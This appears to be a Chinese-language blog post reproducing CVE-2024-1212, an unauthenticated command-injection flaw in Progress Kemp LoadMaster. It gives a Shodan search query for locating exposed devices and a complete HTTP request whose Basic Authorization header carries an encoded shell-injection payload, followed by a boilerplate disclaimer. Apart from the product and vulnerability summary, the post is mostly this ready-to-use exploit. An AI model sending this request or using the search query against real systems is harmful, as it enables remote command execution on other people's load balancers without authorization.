【漏洞复现】Progress Kemp LoadMaster 命令注入漏洞(CVE-2024-1212)

0x01 产品简介

Progress Kemp LoadMaster是一款高性能的应用交付控制器,具有可扩展性,支持实体硬件和虚拟机的负载均衡。它提供了当今应用服务所需的各种功能,包括深度用户验证、资安防护(如WAF/IPS/DDoS防护)以及零信任架构服务。这款控制器旨在为各种规模的企业和单位提供出色的负载平衡和应用程序体验。

0x02 漏洞概述

复制代码
Progress Kemp LoadMaster存在命令注入漏洞,未经身份验证的远程攻击者可以通过 LoadMaster 管理界面访问系统,从而实现任意系统命令执行。

0x03 测绘语句

复制代码
shodan:html:"LoadMaster"

0x04 漏洞复现

漏洞复现:

复制代码
GET /access/set?param=enableapi&value=1 HTTP/1.1

Host:

Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=

0x05 影响范围

复制代码
LoadMaster > 7.2.48.1

0x06 免责声明

复制代码
本文所涉及的任何技术、信息或工具,仅供学习和参考之用。

请勿利用本文提供的信息从事任何违法活动或不当行为。任何因使用本文所提供的信息或工具而导致的损失、后果或不良影响,均由使用者个人承担责任,与本文作者无关。

作者不对任何因使用本文信息或工具而产生的损失或后果承担任何责任。使用本文所提供的信息或工具即视为同意本免责声明,并承诺遵守相关法律法规和道德规范。
相关推荐
灯琰14 小时前
STM32F4+W5500 移植与开发常见问题
网络
SLD_Allen4 小时前
Garak:NVIDIA开源的LLM安全“体检”工具
安全·ai
qyr67895 小时前
全球新能源汽车电机驱动器市场深度调研报告
大数据·网络·人工智能·自动化·汽车
Hiyajo pray6 小时前
SDN 访问控制性能调优方法
服务器·网络·网络安全
初晴融雪-快雪时晴6 小时前
网络硬件全景梳理:从光纤到手机,一张网是如何连接的?
网络·智能手机·智能路由器
辣椒思密达6 小时前
AI出海产品本地化测试:住宅IP在模拟海外用户环境中的实践价值
网络协议·tcp/ip·安全·php·苹果vision pro
huainingning7 小时前
交换机通过ftp下载文件或者传输文件到ftp服务器
运维·服务器·网络
2401_854151558 小时前
嵌入式 Bootloader 与 OTA 固件升级深度解析——从 Flash 分区到安全回滚
开发语言·stm32·单片机·嵌入式硬件·安全·php
花生了什么事o9 小时前
DNS:把域名翻译成 IP 的层级查询机制
网络·网络协议·tcp/ip
satadriver9 小时前
手工加载API函数
安全